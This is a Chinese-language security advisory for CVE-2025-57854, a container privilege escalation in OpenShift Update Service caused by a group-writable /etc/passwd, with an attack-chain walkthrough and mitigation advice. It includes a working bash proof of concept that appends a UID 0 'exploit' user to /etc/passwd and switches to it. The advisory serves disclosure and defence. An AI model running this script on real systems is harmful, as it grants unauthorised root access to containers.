CVE-2025-57854 CVSS 6.4 中危

CVE-2025-57854 OpenShift容器权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-57854

漏洞类型

权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

OpenShift Update Service (OSUS)

漏洞概述

OpenShift Update Service (OSUS) 特定镜像存在权限提升漏洞，原因是构建时/etc/passwd文件被赋予了组可写权限。攻击者若能进入容器执行命令且属于root组，即可利用此权限缺陷修改/etc/passwd，添加UID为0的账户，从而在容器内获得完全的root访问权限。

技术细节

该漏洞的根本原因在于OSUS镜像构建过程中，未能正确设置/etc/passwd文件的权限，导致其拥有组写权限。在Linux系统中，/etc/passwd存储用户账户信息，通常仅root用户可写。然而，如果非root用户属于root组（GID 0），且该文件允许组写入，该用户便具备修改文件的能力。利用此漏洞，攻击者首先需获得容器内的命令执行权限。随后，通过检查组身份确认拥有root组成员资格。攻击者可直接向/etc/passwd追加一行数据，创建一个UID为0的新用户。由于UID 0代表系统超级用户，攻击者切换至此用户后，即可在容器内执行任意管理操作，实现从普通用户到root的权限提升。

攻击链分析

STEP 1

初始访问

攻击者获取目标容器的访问权限，能够以非root用户身份执行命令。

STEP 2

权限检查

攻击者检查当前用户是否属于root组，并验证/etc/passwd文件是否具有组可写权限。

STEP 3

修改账户文件

利用组写权限，攻击者向/etc/passwd文件追加一个新行，创建一个UID为0的新用户账户。

STEP 4

权限提升

攻击者切换至新创建的UID 0用户，获取容器内的完整root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash

# PoC for CVE-2025-57854: Container Privilege Escalation via /etc/passwd
# This script demonstrates how to add a root user if /etc/passwd is group-writable.

PASSWD_FILE="/etc/passwd"

# Check if the current user is in the 'root' group (GID 0)
if groups | grep -q '\broot\b'; then
    echo "[+] Current user is in the root group."
else
    echo "[-] Current user is NOT in the root group. Exploit failed."
    exit 1
fi

# Check if /etc/passwd is writable by the group
if [ -w "$PASSWD_FILE" ]; then
    echo "[+] $PASSWD_FILE is group-writable."
    
    # Define the new malicious root user entry
    # Format: username:password:UID:GID:gecos:home:shell
    # We create a user 'exploit' with UID 0 and no password set
    NEW_USER="exploit:x:0:0:Exploit User:/root:/bin/bash"
    
    echo "[+] Attempting to write new user to $PASSWD_FILE..."
    echo "$NEW_USER" >> "$PASSWD_FILE"
    
    if grep -q "^exploit:" "$PASSWD_FILE"; then
        echo "[+] User 'exploit' added successfully."
        echo "[+] Attempting to switch to user 'exploit' (UID 0)..."
        # Note: su might require a terminal, but in a non-interactive shell or script context,
        # the user entry existing is the proof of concept for persistence.
        su - exploit -c "id"
    else
        echo "[-] Failed to add user."
    fi
else
    echo "[-] $PASSWD_FILE is not writable. Exploit failed."
fi

影响范围

OpenShift Update Service (OSUS) 特定镜像

防御指南

临时缓解措施

临时缓解措施包括在容器启动入口点脚本中运行命令 'chmod g-w /etc/passwd' 以移除组写权限，或者通过Pod Security Policy (PSP) / OpenShift Security Context Constraints (SCC) 限制容器运行时用户不得加入root组。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表